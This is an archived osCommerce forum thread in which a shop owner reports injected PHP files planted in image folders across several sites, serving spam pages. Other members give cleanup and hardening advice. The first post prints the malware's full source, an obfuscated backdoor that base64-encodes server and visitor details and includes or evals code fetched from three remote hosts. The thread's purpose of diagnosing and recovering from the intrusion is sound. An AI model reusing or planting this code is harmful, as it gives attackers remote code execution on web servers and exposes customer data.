Guest Posted April 3, 2008 Share Posted April 3, 2008 i have several sites all with oscommerce in some form (some are hybrid site). Anyways i noticed someone made an account on my new site that i'm putting together, so i was a little curious how they found me. i did a search for the domain on google and came up with the listings looking like this: xspider network xspider network, ARCADE COBRA COMAND, patch calendar commander, kukriniksi biography, spiderman 3 no cd crack, rundll dovnload, download free crack for lula ... www.**************.com/images/infobox/xspider-network.html - 8k - Cached - Similar pages - Note this nancy sinatra rapidshare nancy sinatra rapidshare, download crack warcraft 3 frozen throne no cd 1.20 c, 3d analyze punisher, ultimate surrender full download, nubiles charlie ... www.**************.com/images/infobox/nancy-sinatra-rapidshare.html - 8k - Cached - Similar pages - Note this lfs 2 mechanic download lfs 2 mechanic download, warcraft 3 v.1.20b no-cd, bcad version 3.7, free serial or patch for dr.divx 2.0.0 beta 6, backdoor patch crack, download full ... www.**************.com/images/infobox/lfs-2-mechanic-download.html - 8k - Cached - Similar pages - Note this So i looked in my images/infobox folder and i saw some arrow image files and a php file called "213378.php" So i looked around and they're in every image fold i have! there is one per folder and they are in the catalog/image/... and catalog/admin/... of my site and every other site i have. I downloaded a fresh copy of OSC to make sure these files didn't come with OSC and they didn't. the file contains the following code <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?> when i run it, i get a url not found page just like in the search engines. please help...how can i protect myself?! i password protect everything. Also doing a search for similar /images/infobox/... links like the ones that showed up for me produced a ton of OSC sites that have these fake listing pages popup. Link to comment Share on other sites More sharing options...
The_ancient Posted April 3, 2008 Share Posted April 3, 2008 First thing you need to do is Change all of the passwords on your hosting account, all FTP, Cpanel, etc etc etc... What version of OSC are you using? What Contributions have you installed? You need to delete every file, and reupload a KNOWN SAFE backup, or a new download from here... This script send identifying information to a remote host, and has the potential of executing php including accessing your database and getting customer data.... It is requesting a file from a.rsdcraft.ws ad.runweb.info 7.xmldata.info/? I found one other site hacked with this script, they traced it back to a a unpatch php security hole, so make sure your server is running the lastest php version... Also make sure your permissions are correct. Only have write turned on in temp and public upload dir, turn write permissions OFF unless your changing things.. Link to comment Share on other sites More sharing options...
Guest Posted April 3, 2008 Share Posted April 3, 2008 First thing you need to do is Change all of the passwords on your hosting account, all FTP, Cpanel, etc etc etc... What version of OSC are you using? What Contributions have you installed? You need to delete every file, and reupload a KNOWN SAFE backup, or a new download from here... This script send identifying information to a remote host, and has the potential of executing php including accessing your database and getting customer data.... It is requesting a file from a.rsdcraft.ws ad.runweb.info 7.xmldata.info/? I found one other site hacked with this script, they traced it back to a a unpatch php security hole, so make sure your server is running the lastest php version... Also make sure your permissions are correct. Only have write turned on in temp and public upload dir, turn write permissions OFF unless your changing things.. I have some sites that are MS2 and some that are RC2. Both are hit. I have a HUGE list of contributions installed on some of these sites. I looked back at my last 2 backups which is a month of data, and the files are in the backups. I went ahead and deleted every known file of this script i could find. I also just changed all my passwords to the ftp, database, folder protection, osc account login. Link to comment Share on other sites More sharing options...
Guest Posted April 3, 2008 Share Posted April 3, 2008 I have some sites that are MS2 and some that are RC2. Both are hit. I have a HUGE list of contributions installed on some of these sites. I looked back at my last 2 backups which is a month of data, and the files are in the backups. I went ahead and deleted every known file of this script i could find. I also just changed all my passwords to the ftp, database, folder protection, osc account login. You should ask your webhosts how these attacks were successful. Link to comment Share on other sites More sharing options...
♥Vger Posted April 3, 2008 Share Posted April 3, 2008 If your hosts are using a version of PHP with known vulnerabilities, then the site could be hacked again. If your hosts provide cPanel and other sites on the server have been hacked then your site will be hacked again - because cPanel has no jailed root for websites (hack one, hack them all!). Vger Link to comment Share on other sites More sharing options...
nguoivienxu66 Posted April 5, 2008 Share Posted April 5, 2008 If your hosts are using a version of PHP with known vulnerabilities, then the site could be hacked again. If your hosts provide cPanel and other sites on the server have been hacked then your site will be hacked again - because cPanel has no jailed root for websites (hack one, hack them all!). Vger i think this condition is called local attack . Threre are many server is hacked like that. --------------- Lary Man Link to comment Share on other sites More sharing options...
Guest Posted April 10, 2008 Share Posted April 10, 2008 Jesus knows all. God bless, Matt Link to comment Share on other sites More sharing options...
germ Posted May 31, 2008 Share Posted May 31, 2008 As far as I know this "hack" is because the images folder has "777" permissions. They should be no higher than "755" If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.